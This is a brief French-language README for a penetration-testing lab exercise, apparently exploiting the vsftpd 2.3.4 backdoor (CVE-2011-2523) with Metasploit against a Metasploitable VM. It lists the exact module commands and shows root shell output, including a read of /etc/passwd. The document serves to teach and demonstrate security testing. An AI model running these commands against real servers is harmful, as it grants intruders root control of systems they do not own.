
Évaluation de la vulnérabilité et exploitation de vsftpd 2.3.4 (CVE-2011-2523) en utilisant Metasploit. Rapport complet et preuve d'accès root inclus.
Exploitation d'une vulnérabilité connue dans
vsftpd 2.3.4en utilisant Metasploit.
192.168.150.133exploit/unix/ftp/vsftpd_234_backdoorvsftpd 2.3.4 contient une backdoor malveillante qui ouvre un shell de commande sur le port 6200 lorsqu'un nom d'utilisateur spécialement conçu (se terminant par :)) est reçu.
CVE : CVE-2011-2523
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run
whoami
> root
id
> uid=0(root) gid=0(root)
hostname
> metasploitable
uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...
cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
...
L'accès au shell root donne à l'attaquant un contrôle total sur le système cible — y compris l'élévation de privilèges, le déplacement latéral, l'exfiltration de données et l'accès persistant.
📝 Rapport PDF complet disponible dans ce dépôt : vsftpd-exploit-report.pdf
Fait avec 🔥 par vedpakhare